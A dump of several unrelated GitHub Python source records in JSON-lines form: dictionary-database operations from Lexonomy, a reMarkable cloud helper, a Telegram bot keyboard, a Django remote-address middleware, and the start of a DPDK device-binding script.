group by e.id order by priority, level, e.sortkey, s.level limit ?\"\n c1 = dictDB.execute(sql_list, (\"%\"+searchtext+\"%\", \"%\"+searchtext+\"%\", configs[\"xema\"].get(\"root\"), howmany))\n entries = []\n for r1 in c1.fetchall():\n item = {\"id\": r1[\"id\"], \"title\": r1[\"title\"], \"exactMatch\": (r1[\"level\"] == 1 and r1[\"priority\"] == 1)}\n if r1[\"level\"] > 1:\n item[\"title\"] += \" ← \" + r1[\"txt\"] + \"\"\n entries.append(item)\n return entries\n\ndef extractText(xml, elName):\n elName = str(elName)\n if elName == \"\":\n return []\n pat = r\"<\" + elName + \"[^>]*>([^<]*)\"\n return re.findall(pat, xml)\n\ndef extractFirstText(xml):\n pat = r\"<([^\\s>]+)[^>]*>([^<>]*?)]+)>\"\n for match in re.findall(pat, xml):\n if match[0] == match[2] and match[1].strip() != \"\":\n return match[1].strip()\n return \"\"\n\ndef getDictStats(dictDB):\n res = {\"entryCount\": 0, \"needResave\": 0}\n c = dictDB.execute(\"select count(*) as entryCount from entries\")\n r = c.fetchone()\n res[\"entryCount\"] = r[\"entryCount\"]\n c = dictDB.execute(\"select count(*) as needResave from entries where needs_resave=1 or needs_refresh=1 or needs_refac=1\")\n r = c.fetchone()\n res[\"needResave\"] = r[\"needResave\"]\n return res\n\ndef updateDictConfig(dictDB, dictID, configID, content):\n dictDB.execute(\"delete from configs where id=?\", (configID, ))\n dictDB.execute(\"insert into configs(id, json) values(?, ?)\", (configID, json.dumps(content)))\n dictDB.commit()\n\n if configID == \"ident\" or configID == \"users\":\n attachDict(dictDB, dictID)\n return content, False\n elif configID == \"titling\" or configID == \"searchability\":\n resaveNeeded = flagForResave(dictDB)\n return content, resaveNeeded\n elif configID == \"links\":\n resaveNeeded = flagForResave(dictDB)\n c = dictDB.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='linkables'\")\n if not c.fetchone():\n dictDB.execute(\"CREATE TABLE linkables (id INTEGER PRIMARY KEY AUTOINCREMENT, entry_id INTEGER REFERENCES entries (id) ON DELETE CASCADE, txt TEXT, element TEXT)\")\n dictDB.execute(\"CREATE INDEX link ON linkables (txt)\")\n return content, resaveNeeded\n elif configID == \"subbing\":\n refacNeeded = flagForRefac(dictDB)\n return content, refacNeeded\n else:\n return content, False\n\ndef flagForResave(dictDB):\n c = dictDB.execute(\"update entries set needs_resave=1\")\n dictDB.commit()\n return (c.rowcount > 0)\n\ndef flagForRefac(dictDB):\n c = dictDB.execute(\"update entries set needs_refac=1\")\n dictDB.commit()\n return (c.rowcount > 0)\n\ndef makeQuery(lemma):\n words = []\n for w in lemma.split(\" \"):\n if w != \"\":\n words.append('[lc=\"'+w+'\"+|+lemma_lc=\"'+w+'\"]')\n ret = re.sub(\" \",\"+\", lemma) + \";q=aword,\" + \"\".join(words) + \";q=p+0+0>0+1+[ws(\\\".*\\\",+\\\"definitions\\\",+\\\".*\\\")];exceptmethod=PREV-CONC\"\n return ret\n\ndef clearRefac(dictDB):\n dictDB.execute(\"update entries set needs_refac=0, needs_refresh=0\")\n dictDB.commit()\n\n\ndef refac(dictDB, dictID, configs):\n from xml.dom import minidom, Node\n if len(configs['subbing']) == 0:\n return False\n c = dictDB.execute(\"select e.id, e.xml, h.email from entries as e left outer join history as h on h.entry_id=e.id where e.needs_refac=1 order by h.[when] asc limit 1\")\n r = c.fetchone()\n if not r:\n return False\n entryID = r[\"id\"]\n xml = r[\"xml\"]\n email = r[\"email\"] or \"\"\n doc = minidom.parseString(xml)\n doc.documentElement.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:entryID\", 
str(entryID))\n #in the current entry, remove all \n _els = doc.getElementsByTagNameNS(\"http://www.lexonomy.eu/\", \"subentryParent\")\n for el in _els:\n el.parentNode.removeChild(el)\n # in the current entry, find elements which are subentries, and are not contained inside other subentries\n els = []\n for doctype in configs[\"subbing\"]:\n _els = doc.getElementsByTagName(doctype)\n for el in _els:\n if el.parentNode and el.parentNode.nodeType == 1:\n isSubSub = False\n p = el.parentNode\n while p.parentNode and p.parentNode.nodeType == 1:\n if p.tagName in configs[\"subbing\"]:\n isSubSub = True\n p = p.parentNode\n if not isSubSub:\n els.append(el)\n dictDB.execute(\"delete from sub where parent_id=?\", (entryID, ))\n # keep saving subentries of the current entry until there are no more subentries to save:\n if len(els) > 0:\n for el in els:\n subentryID = el.getAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\")\n xml = el.toxml()\n if subentryID:\n subentryID, adjustedXml, changed, feedback = updateEntry(dictDB, configs, subentryID, xml, email.lower(), {\"refactoredFrom\":entryID})\n el.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:subentryID\", str(subentryID))\n dictDB.execute(\"insert into sub(parent_id, child_id) values(?,?)\", (entryID, subentryID))\n if changed:\n dictDB.execute(\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?) and id<>?\", (subentryID, entryID))\n else:\n subentryID, adjustedXml, feedback = createEntry(dictDB, configs, None, xml, email.lower(), {\"refactoredFrom\":entryID})\n el.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:subentryID\", str(subentryID))\n subentryID, adjustedXml, changed, feedback = updateEntry(dictDB, configs, subentryID, el.toxml(), email.lower(), {\"refactoredFrom\":entryID})\n dictDB.execute(\"insert into sub(parent_id, child_id) values(?,?)\", (entryID, subentryID))\n dictDB.execute(\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?)\", (subentryID, ))\n xml = doc.toxml().replace('', '').strip()\n dictDB.execute(\"update entries set xml=?, needs_refac=0 where id=?\", (xml, entryID))\n dictDB.commit()\n\ndef refresh(dictDB, dictID, configs):\n from xml.dom import minidom, Node\n if len(configs['subbing']) == 0:\n return False\n # takes one entry that needs refreshing and sucks into it the latest versions of its subentries\n # get one entry that needs refreshing where none of its children needs refreshing\n c = dictDB.execute(\"select pe.id, pe.xml from entries as pe left outer join sub as s on s.parent_id=pe.id left join entries as ce on ce.id=s.child_id where pe.needs_refresh=1 and (ce.needs_refresh is null or ce.needs_refresh=0) limit 1\")\n r = c.fetchone()\n if not r:\n return False\n parentID = r[\"id\"]\n parentXml = r[\"xml\"]\n if not \"xmlns:lxnm\" in parentXml:\n parentXml = re.sub(r\"<([^>^ ]*) \", r\"<\\1 xmlns:lxnm='http://www.lexonomy.eu/' \", parentXml)\n parentDoc = minidom.parseString(parentXml)\n # this will be called repeatedly till exhaustion\n while True:\n # find an element which is a subentry and which we haven't sucked in yet:\n el = None\n for doctype in configs[\"subbing\"]:\n els = parentDoc.documentElement.getElementsByTagName(doctype)\n for el in els:\n if el and not el.hasAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\"):\n el = None\n if el and el.hasAttributeNS(\"http://www.lexonomy.eu/\", \"done\"):\n el = None\n if el:\n break\n if el:\n break\n if el: #if such en element exists\n subentryID = 
el.getAttributeNS(\"http://www.lexonomy.eu/\", \"subentryID\")\n # get the subentry from the database and inject it into the parent's xml:\n c = dictDB.execute(\"select xml from entries where id=?\", (subentryID, ))\n r = c.fetchone()\n if not r:\n el.parentNode.removeChild(el)\n else:\n childXml = r[\"xml\"]\n childDoc = minidom.parseString(childXml)\n elNew = childDoc.documentElement\n el.parentNode.replaceChild(elNew, el)\n elNew.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:subentryID\", subentryID)\n elNew.setAttributeNS(\"http://www.lexonomy.eu/\", \"lxnm:done\", \"1\")\n else: #if no such element exists: we are done\n els = parentDoc.documentElement.getElementsByTagName(\"*\")\n for el in els:\n if el.getAttributeNS(\"http://www.lexonomy.eu/\", \"done\"):\n el.removeAttributeNS(\"http://www.lexonomy.eu/\", \"done\")\n parentXml = parentDoc.toxml().replace('', '').strip()\n # save the parent's xml (into which all subentries have been injected by now) and tell it that it needs a resave:\n dictDB.execute(\"update entries set xml=?, needs_refresh=0, needs_resave=1 where id=?\", (parentXml, parentID))\n return True\n\ndef resave(dictDB, dictID, configs):\n from xml.dom import minidom, Node\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n c = dictDB.execute(\"select id, xml from entries where needs_resave=1 limit 12\")\n for r in c.fetchall():\n entryID = r[\"id\"]\n xml = r[\"xml\"]\n xml = re.sub(r\"\\s+xmlns:lxnm=['\\\"]http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"']\", \"\", xml)\n xml = re.sub(r\"^<([^>^ ]*) \", r\"<\\1 xmlns:lxnm='http://www.lexonomy.eu/' \", xml)\n dictDB.execute(\"update entries set needs_resave=0, title=?, sortkey=? 
where id=?\", (getEntryTitle(xml, configs[\"titling\"]), toSortKey(getSortTitle(xml, configs[\"titling\"]), abc), entryID))\n dictDB.execute(\"delete from searchables where entry_id=?\", (entryID,))\n dictDB.execute(\"insert into searchables(entry_id, txt, level) values(?, ?, ?)\", (entryID, getEntryTitle(xml, configs[\"titling\"], True), 1))\n dictDB.execute(\"insert into searchables(entry_id, txt, level) values(?, ?, ?)\", (entryID, getEntryTitle(xml, configs[\"titling\"], True).lower(), 1))\n headword = getEntryHeadword(xml, configs[\"titling\"].get(\"headword\"))\n for searchable in getEntrySearchables(xml, configs):\n if searchable != headword:\n dictDB.execute(\"insert into searchables(entry_id, txt, level) values(?,?,?)\", (entryID, searchable, 2))\n if configs[\"links\"]:\n updateEntryLinkables(dictDB, entryID, xml, configs, True, True)\n dictDB.commit()\n return True\n\ndef getEntryLinks(dictDB, dictID, entryID):\n ret = {\"out\": [], \"in\": []}\n c = dictDB.execute(\"SELECT * FROM linkables WHERE entry_id=?\", (entryID,))\n conn = getLinkDB()\n for r in c.fetchall():\n ret[\"out\"] = ret[\"out\"] + links_get(dictID, r[\"element\"], r[\"txt\"], \"\", \"\", \"\")\n ret[\"in\"] = ret[\"in\"] + links_get(\"\", \"\", \"\", dictID, r[\"element\"], r[\"txt\"])\n return ret\n\n\ndef updateEntryLinkables(dictDB, entryID, xml, configs, save=True, save_xml=True):\n from xml.dom import minidom, Node\n doc = minidom.parseString(xml)\n ret = []\n for linkref in configs[\"links\"].values():\n for el in doc.getElementsByTagName(linkref[\"linkElement\"]):\n identifier = linkref[\"identifier\"]\n for pattern in re.findall(r\"%\\([^)]+\\)\", linkref[\"identifier\"]):\n text = \"\"\n extract = extractText(el.toxml(), pattern[2:-1])\n extractfull = extractText(xml, pattern[2:-1])\n if len(extract) > 0:\n text = extract[0]\n elif len(extractfull) > 0:\n text = extractfull[0]\n identifier = identifier.replace(pattern, text)\n el.setAttribute('lxnm:linkable', identifier)\n ret.append({'element': linkref[\"linkElement\"], \"identifier\": identifier})\n xml = doc.toxml().replace('', '').strip()\n if save:\n dictDB.execute(\"delete from linkables where entry_id=?\", (entryID,))\n for linkable in ret:\n dictDB.execute(\"insert into linkables(entry_id, txt, element) values(?,?,?)\", (entryID, linkable[\"identifier\"], linkable[\"element\"]))\n if save_xml and len(ret)>0:\n dictDB.execute(\"update entries set xml=? 
where id=?\", (xml, entryID))\n dictDB.commit()\n return xml\n\ndef getEntrySearchables(xml, configs):\n ret = []\n ret.append(getEntryHeadword(xml, configs[\"titling\"].get(\"headword\")))\n if configs[\"searchability\"].get(\"searchableElements\"):\n for sel in configs[\"searchability\"].get(\"searchableElements\"):\n for txt in extractText(xml, sel):\n if txt != \"\" and txt not in ret:\n ret.append(txt)\n return ret\n\ndef flagEntry(dictDB, dictID, configs, entryID, flag, email, historiography):\n if configs[\"titling\"].get(\"abc\") and configs[\"titling\"].get(\"abc\") != \"\":\n abc = configs[\"titling\"].get(\"abc\")\n else:\n abc = configs[\"siteconfig\"][\"defaultAbc\"]\n c = dictDB.execute(\"select id, xml from entries where id=?\", (entryID,))\n row = c.fetchone()\n xml = row[\"xml\"] if row else \"\"\n xml = re.sub(r\" xmlns:lxnm=[\\\"\\']http:\\/\\/www\\.lexonomy\\.eu\\/[\\\"\\']\", \"\", xml)\n xml = re.sub(r\"\\=\\\"([^\\\"]*)\\\"\", r\"='\\1'\", xml)\n xml = re.sub(r\" lxnm:(sub)?entryID='[0-9]+'\", \"\", xml)\n xml = addFlag(xml, flag, configs[\"flagging\"], configs[\"xema\"])\n\n # tell my parents that they need a refresh:\n dictDB.execute(\"update entries set needs_refresh=1 where id in (select parent_id from sub where child_id=?)\", (entryID, ))\n # update me\n needs_refac = 1 if len(list(configs[\"subbing\"].keys())) > 0 else 0\n needs_resave = 1 if configs[\"searchability\"].get(\"searchableElements\") and len(configs[\"searchability\"].get(\"searchableElements\")) > 0 else 0\n dictDB.execute(\"update entries set doctype=?, xml=?, title=?, sortkey=$sortkey, needs_refac=?, needs_resave=? where id=?\", (getDoctype(xml), xml, getEntryTitle(xml, configs[\"titling\"]), toSortKey(getSortTitle(xml, configs[\"titling\"]), abc), needs_refac, needs_resave, entryID))\n dictDB.execute(\"insert into history(entry_id, action, [when], email, xml, historiography) values(?, ?, ?, ?, ?, ?)\", (entryID, \"update\", str(datetime.datetime.utcnow()), email, xml, json.dumps(historiography)))\n dictDB.commit()\n return entryID\n\n\ndef addFlag(xml, flag, flagconfig, xemaconfig):\n flag_element = flagconfig[\"flag_element\"]\n\n path = getFlagElementPath(xemaconfig, flag_element)\n loc1, loc2 = getFlagElementInString(path, xml)\n\n return \"{0}<{1}>{2}{3}\".format(\n xml[:loc1], flag_element, flag, xml[loc2:])\n\n\ndef getFlagElementPath(xema, flag_element):\n result = getFlagElementPath_recursive(xema, flag_element, xema[\"root\"])\n if result is not None:\n result.insert(0, xema[\"root\"])\n return result\n\n\ndef getFlagElementPath_recursive(xema, flag_element, current_element):\n # try all children\n for child_props in xema[\"elements\"][current_element][\"children\"]:\n next_el = child_props[\"name\"]\n\n # if we get to the flag element, return!\n if next_el == flag_element:\n return [flag_element]\n\n # else, recursive search, depth first\n path = getFlagElementPath_recursive(xema, flag_element, next_el)\n\n # if returned is not None, then we found what we need, just prepend to the returned path\n if path is not None:\n return [next_el] + path\n\n # nothing useful found, return None\n return None\n\n\ndef getFlagElementInString(path, xml):\n start_out, end_out = 0, len(xml)\n start_in, end_in = 0, len(xml)\n\n # find each element in path to flag element, start with outmost one\n for path_element in path:\n regex = re.compile(\"<{}[^>]*>([\\s\\S]*?)\".format(path_element, path_element))\n match = regex.search(xml, start_in, end_in)\n\n # we can not find the element, just return to the 
beginning of outer element\n if match is None:\n return (start_in, start_in)\n\n start_out = match.start(0)\n end_out = match.end(0)\n start_in = match.start(1)\n end_in = match.end(1)\n\n # we found it! Return the span where flag element exists in xml\n return (start_out, end_out)\n\n\ndef readDictHistory(dictDB, dictID, configs, entryID):\n history = []\n c = dictDB.execute(\"select * from history where entry_id=? order by [when] desc\", (entryID,))\n for row in c.fetchall():\n xml = row[\"xml\"]\n if row[\"xml\"]:\n xml = setHousekeepingAttributes(entryID, row[\"xml\"], configs[\"subbing\"])\n history.append({\"entry_id\": row[\"entry_id\"], \"revision_id\": row[\"id\"], \"content\": xml, \"action\": row[\"action\"], \"when\": row[\"when\"], \"email\": row[\"email\"] or \"\", \"historiography\": json.loads(row[\"historiography\"])})\n return history\n\ndef verifyUserApiKey(email, apikey):\n conn = getMainDB()\n c = conn.execute(\"select email from users where email=? and apiKey=?\", (email, apikey))\n row = c.fetchone()\n if not row or siteconfig[\"readonly\"]:\n return {\"valid\": False}\n else:\n return {\"valid\": True, \"email\": email or \"\"}\n\ndef links_add(source_dict, source_el, source_id, target_dict, target_el, target_id):\n conn = getLinkDB()\n c = conn.execute(\"select * from links where source_dict=? and source_element=? and source_id=? and target_dict=? and target_element=? and target_id=?\", (source_dict, source_el, source_id, target_dict, target_el, target_id))\n row = c.fetchone()\n if not row:\n conn.execute(\"insert into links (source_dict, source_element, source_id, target_dict, target_element, target_id) values (?,?,?,?,?,?)\", (source_dict, source_el, source_id, target_dict, target_el, target_id))\n conn.commit()\n c = conn.execute(\"select * from links where source_dict=? and source_element=? and source_id=? and target_dict=? and target_element=? and target_id=?\", (source_dict, source_el, source_id, target_dict, target_el, target_id))\n row = c.fetchone()\n return {\"link_id\": row[\"link_id\"], \"source_dict\": row[\"source_dict\"], \"source_el\": row[\"source_element\"], \"source_id\": row[\"source_id\"], \"target_dict\": row[\"target_dict\"], \"target_el\": row[\"target_element\"], \"target_id\": row[\"target_id\"]}\n\ndef links_delete(dictID, linkID):\n conn = getLinkDB()\n conn.execute(\"delete from links where source_dict=? 
and link_id=?\", (dictID, linkID))\n conn.commit()\n c = conn.execute(\"select * from links where link_id=?\", (linkID, ))\n if len(c.fetchall()) > 0:\n return False\n else:\n return True\n\ndef links_get(source_dict, source_el, source_id, target_dict, target_el, target_id):\n params = []\n where = []\n if source_dict != \"\":\n where.append(\"source_dict=?\")\n params.append(source_dict)\n if source_el != \"\":\n where.append(\"source_element=?\")\n params.append(source_el)\n if source_id != \"\":\n where.append(\"source_id=?\")\n params.append(source_id)\n if target_dict != \"\":\n where.append(\"target_dict=?\")\n params.append(target_dict)\n if target_el != \"\":\n where.append(\"target_element=?\")\n params.append(target_el)\n if target_id != \"\":\n where.append(\"target_id=?\")\n params.append(target_id)\n query = \"select * from links\"\n if len(where) > 0:\n query += \" where \" + \" and \".join(where)\n conn = getLinkDB()\n c = conn.execute(query, tuple(params))\n res = []\n for row in c.fetchall():\n res.append({\"link_id\": row[\"link_id\"], \"source_dict\": row[\"source_dict\"], \"source_el\": row[\"source_element\"], \"source_id\": row[\"source_id\"], \"target_dict\": row[\"target_dict\"], \"target_el\": row[\"target_element\"], \"target_id\": row[\"target_id\"]})\n return res\n\ndef getDictLinkables(dictDB):\n ret = []\n c = dictDB.execute(\"SELECT * FROM linkables ORDER BY entry_id, element, txt\")\n for r in c.fetchall():\n ret.append({\"element\": r[\"element\"], \"link\": r[\"txt\"], \"entry\": r[\"entry_id\"]})\n return ret\n\ndef addAutoNumbers(dictDB, dictID, countElem, storeElem):\n from xml.dom import minidom, Node\n isAttr = False\n if storeElem[0] == '@':\n isAttr = True\n storeElem = storeElem[1:]\n c = dictDB.execute(\"select id, xml from entries\")\n process = 0\n for r in c.fetchall():\n entryID = r[\"id\"]\n xml = r[\"xml\"]\n doc = minidom.parseString(xml)\n allEmpty = True\n for el in doc.getElementsByTagName(countElem):\n if isAttr:\n if el.getAttribute(storeElem) != \"\":\n allEmpty = False\n else:\n for sel in el.getElementsByTagName(storeElem):\n if sel.firstChild != None and sel.firstChild.nodeValue != \"\":\n allEmpty = False\n if allEmpty:\n count = 0\n for el in doc.getElementsByTagName(countElem):\n count += 1\n if isAttr:\n el.setAttribute(storeElem, str(count))\n else:\n for sel in el.getElementsByTagName(storeElem):\n el.removeChild(sel)\n n_elem = doc.createElement(storeElem)\n el.appendChild(n_elem)\n n_elem.appendChild(doc.createTextNode(str(count)))\n process += 1\n xml = doc.toxml().replace('', '').strip()\n dictDB.execute(\"update entries set xml=?, needs_refac=0 where id=?\", (xml, entryID))\n dictDB.commit()\n return process\n","repo_name":"akki2825/english-nyishi-dictionary","sub_path":"website/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":64494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25630633370","text":"\"\"\"\nThis file contains a class and functions that give an easy abstraction\nlayer between me and rmapy. 
It's not perfect yet by any measure, but quite\nconvenient.\n\"\"\"\nimport uuid\nimport zipfile\nimport os\nimport os.path\nimport shutil\n\nimport rmapy.api\nimport rmapy.document\nimport rmapy.folder\n\nclass ReMarkable():\n\n def __init__(self, templateZip):\n self.templateZip = templateZip\n self.rma = rmapy.api.Client()\n self.rma.renew_token()\n if not self.rma.is_auth():\n raise ConnectionError(\"Cannot connect to ReMarkable cloud, try\"\n \"manually re-registering this device.\" )\n self.discover_filesystem()\n\n def discover_filesystem(self):\n \"\"\"Loads all remote files and folders\"\"\"\n self.collections = self.rma.get_meta_items()\n self.docs = [ d for d in self.collections if isinstance(d, rmapy.document.Document) ]\n self.dirs = [ d for d in self.collections if isinstance(d, rmapy.folder.Folder) ]\n\n def make_labjournal_subfolder(self, name):\n \"\"\"\n Generate new folder in labjournal folder with given name.\n Args:\n name (str): Name for new folder\n \"\"\"\n # first make new folder:\n new_folder = rmapy.folder.Folder( name )\n labjournal = self.find_labjournal_folder()\n result = self.rma.create_folder(new_folder)\n if not result:\n print(\"Warning, folder creation bad return.\")\n new_folder.Parent = labjournal.ID\n self.rma.update_metadata(new_folder)\n self.discover_filesystem()\n\n def prepare_templateZip( self, name ):\n \"\"\"\n Make a zipdoc for uploading based on a local template.\n It changes the UUID so no duplicates.\n Keeps the zip in memory for imediate uploading.\n Args:\n name (str): path to template file\n Returns:\n zipdoc (.zip file): new zip file\n \"\"\"\n loc, newUUID = make_new_UUID( self.templateZip, name )\n zipdoc = rmapy.document.ZipDocument( _id= newUUID, file=loc )\n print(\"Created file \" + str(newUUID))\n # and remove the generated zip...\n os.remove(loc)\n return zipdoc\n\n def empty_dir( self, path ):\n \"\"\"\n Delete the contents of the entire directory. 
*Not* the dir itsself.\n\n Args:\n path (str): path to dir to empty.\n \"\"\"\n dirID = self.path_to_ID(path)\n dirs = self.get_subfolders(dirID)\n if len(dirs) != 0:\n raise ValueError( \"This folder has subdirs\" )\n docs = self.get_subfiles( dirID )\n if len(docs) == 0:\n pass # should I add a warning or something?\n for d in docs:\n self.rma.delete( d )\n\n def delete(self, doc):\n \"\"\"\n Delete a file in the ReMarakabale cloud at path doc\n\n Args:\n doc (str): Path to file to delete.\n \"\"\"\n self.discover_filesystem()\n splitdoc = splitall(doc)\n dirpath = listToPath(splitdoc[:-1])\n rawdir = self.path_to_ID( dirpath )\n filename = splitdoc[-1]\n try:\n doc = [ f for f in self.docs if (\n f.Parent == rawdir and\n f.VissibleName == filename and\n isinstance(f, rmapy.document.Document) )][0]\n except IndexError:\n raise ValueError( \"{0} could not be deleted: not found in cloud.\".format(doc) )\n self.rma.delete( doc )\n\n def upload( self, path_to_file, parentFolder ):\n \"\"\"\n Upload the file at path_to_file to parentFolder in the\n ReMarkable cloud\n\n Args:\n path_to_file (str): path to file to upload, .pdf or .epub.\n parentFolder (str): path to folder in which to upload, '' is root.\n \"\"\"\n rawDoc = rmapy.document.ZipDocument( doc=path_to_file )\n parentFolderID = self.path_to_ID( parentFolder )\n if parentFolderID != '':\n parentFolder = [ f for f in self.rma.get_meta_items() if f.ID == parentFolderID][0]\n else:\n parentfolder = ''\n self.rma.upload( rawDoc, parentFolder )\n self.discover_filesystem()\n\n def path_to_ID( self, path ):\n \"\"\"\n Convert cloud path to actual id of the folder.\n\n Args:\n path (str): path to dir on rmcloud.\n\n Returns:\n ID (str): ID string.\n \"\"\"\n self.discover_filesystem()\n if path == '':\n return '' # saves some pain probably.\n splitpath = splitall( path )\n splitpath = [''] + splitpath\n IDlist = ['']\n for di in range(len( splitpath )):\n if di == 0:\n continue\n pF = [ f for f in self.rma.get_meta_items() if (\n isinstance(f, rmapy.folder.Folder) and\n f.VissibleName == splitpath[di] and\n f.Parent == IDlist[di-1] ) ] [0]\n IDlist.append(pF.ID)\n return IDlist[-1]\n\n def ID_to_path( self, ID ):\n \"\"\"\n Recursive function that finds the human readable path for an ID.\n Args:\n ID (str): rmCloud ID of a folder or document.\n Returns:\n path (str): Human readable path to ID.\n \"\"\"\n c = [ f for f in self.collections if f.ID == ID][0]\n if c.Parent == \"\":\n return r\"/{}\".format( c.VissibleName )\n else:\n return self.ID_to_path(c.Parent) + r\"/{}\".format( c.VissibleName )\n\n def find_labjournal_folder( self ):\n return [ f for f in self.get_subfolders('') if f.VissibleName == \"Labjournal\"][0]\n\n def get_subfolders(self, parentfolder=\"\"):\n self.discover_filesystem()\n return [ f for f in self.dirs if f.Parent == parentfolder ]\n\n def get_subfiles(self, parentfolder=\"\"):\n self.discover_filesystem()\n return [ d for d in self.docs if d.Parent == parentfolder ]\n\n def listdir(self, parentfolder=r\"/\",filesorfolders=\"\"):\n \"\"\"\n List files and folder in parentfolder. 
Parentfolder is given as a path, NOT an ID.\n Using filesorfolders you can set to ony show either subfiles or subfolders.\n TODO: filesorfolders is not implemented yet!!\n Args:\n parentfolder (str): absolute path to folder of which to list content\n filesorfolders (str): can be \"\", \"folder\", \"file\", whether to look for files of folders or all.\n Returns:\n list with (ID, path) string pairs\n \"\"\"\n self.discover_filesystem()\n ID = self.path_to_ID(parentfolder)\n files = self.get_subfiles(ID)\n dirs = self.get_subfolders(ID)\n result = list()\n for i in dirs+files:\n visname = self.ID_to_path(i)\n result.append( (i,visname) )\n return result\n\ndef make_new_UUID( zipLoc, newName ):\n \"\"\"\n Rename ReMarkable zip file to another generated UUID so we can do auto-upload.\n\n Args:\n zipLoc (str): path to zip file\n Returns:\n str: path to new zipfile\n \"\"\"\n newUUID = str(uuid.uuid4())\n basedir = os.path.dirname( zipLoc )\n directory_to_extract_to = os.path.join( basedir,\n \"temp\" )\n with zipfile.ZipFile(zipLoc, 'r') as zip_ref:\n zip_ref.extractall(directory_to_extract_to)\n for fileName in os.listdir( directory_to_extract_to ):\n name, extension = os.path.splitext(fileName)\n newFileName = newUUID + extension\n os.rename(os.path.join(directory_to_extract_to, fileName),\n os.path.join(directory_to_extract_to, newFileName))\n newPath = shutil.make_archive( newName, 'zip', directory_to_extract_to)\n shutil.rmtree( directory_to_extract_to )\n return newPath, newUUID\n\ndef splitall(path):\n allparts = []\n while 1:\n parts = os.path.split(path)\n if parts[0] == path: # sentinel for absolute paths\n allparts.insert(0, parts[0])\n break\n elif parts[1] == path: # sentinel for relative paths\n allparts.insert(0, parts[1])\n break\n else:\n path = parts[0]\n allparts.insert(0, parts[1])\n return allparts\n\ndef listToPath(l):\n path = \"\"\n for i in l:\n path = os.path.join(path,i)\n return path\n","repo_name":"WetenSchaap/remarkableAutomation","sub_path":"remarkable.py","file_name":"remarkable.py","file_ext":"py","file_size_in_byte":8341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39650867765","text":"from aiogram.types import ReplyKeyboardMarkup, KeyboardButton\n\nb1 = KeyboardButton('/working_mode')\nb2 = KeyboardButton('/job_places')\nb3 = KeyboardButton('Share Contact', request_contact=True)\nb4 = KeyboardButton('My Places', request_location=True)\n\n\nkb_user = ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True)\n\nkb_user.add(b1).add(b2).add(b3).add(b4)\n\n","repo_name":"nurbol0tt/qbot","sub_path":"tgbot/keyboards/reply.py","file_name":"reply.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32398589978","text":"# -*- coding: utf-8 -*-\n\nimport settings\n\ndef SetupRemoteAddr(get_response):\n\t\"\"\"\n\tMiddleware that sets REMOTE_ADDR based on HTTP_X_FORWARDED_FOR, if the\n\tlatter is set. This is useful if you're sitting behind a reverse proxy that\n\tcauses each request's REMOTE_ADDR to be set to 127.0.0.1.\n\n\tNote that this does NOT validate HTTP_X_FORWARDED_FOR. If you're not behind\n\ta reverse proxy that sets HTTP_X_FORWARDED_FOR automatically, do not use\n\tthis middleware. Anybody can spoof the value of HTTP_X_FORWARDED_FOR, and\n\tbecause this sets REMOTE_ADDR based on HTTP_X_FORWARDED_FOR, that means\n\tanybody can \"fake\" their IP address. 
Only use this when you can absolutely\n\ttrust the value of HTTP_X_FORWARDED_FOR.\n\t\"\"\"\n\n\tINTERNAL_ADDRS = getattr(settings, 'INTERNAL_ADDRS', [])\n\n\tdef middleware(request):\n\n\t\trequest.IsBot = False\n\n\t\t# request.META['REMOTE_ADDR'] = \"2601:582:4003:ea10:c97d:259f:ec7e:604a\"\n\n\t\t# HTTP_X_FORWARDED_FOR can be a comma-separated list of IPs. The\n\t\t# client's IP will be the first one.\n\t\tif 'HTTP_X_FORWARDED_FOR' in request.META:\n\t\t\tfor i in request.META['HTTP_X_FORWARDED_FOR'].split(','):\n\t\t\t\ti = i.strip()\n\t\t\t\trequest.META['REMOTE_ADDR'] = i\n\t\t\t\tif i != 'unknown':\n\t\t\t\t\tbreak\n\t\t\t\trequest._broken_remote_addr = True\n\n\t\tif 'HTTP_USER_AGENT' not in request.META:\n\t\t\trequest._broken_remote_addr = True\n\n\t\tfor i in INTERNAL_ADDRS:\n\t\t\tif i.match(request.META['REMOTE_ADDR']):\n\t\t\t\trequest.META['INTERNAL_ADDR'] = True\n\t\t\t\tbreak\n\t\telse:\n\t\t\tif 'INTERNAL_ADDR' in request.META:\n\t\t\t\tdel request.META['INTERNAL_ADDR']\n\n\t\treturn get_response(request)\n\n\treturn middleware\n\n# ----------------------------------------------------------------------------\n","repo_name":"tomaszhlawiczka/tru","sub_path":"dj/mw/SetupRemoteAddr.py","file_name":"SetupRemoteAddr.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4807249224","text":"import sys\nimport os\nimport subprocess\nimport argparse\nimport platform\n\nfrom glob import glob\nfrom os.path import exists, basename\nfrom os.path import join as path_join\n\n# The PCI base class for all devices\nnetwork_class = {'Class': '02', 'Vendor': None, 'Device': None,\n 'SVendor': None, 'SDevice': None}\nacceleration_class = {'Class': '12', 'Vendor': None, 'Device': None,\n 'SVendor': None, 'SDevice': None}\nifpga_class = {'Class': '12', 'Vendor': '8086', 'Device': '0b30',\n 'SVendor': None, 'SDevice': None}\nencryption_class = {'Class': '10', 'Vendor': None, 'Device': None,\n 'SVendor': None, 'SDevice': None}\nintel_processor_class = {'Class': '0b', 'Vendor': '8086', 'Device': None,\n 'SVendor': None, 'SDevice': 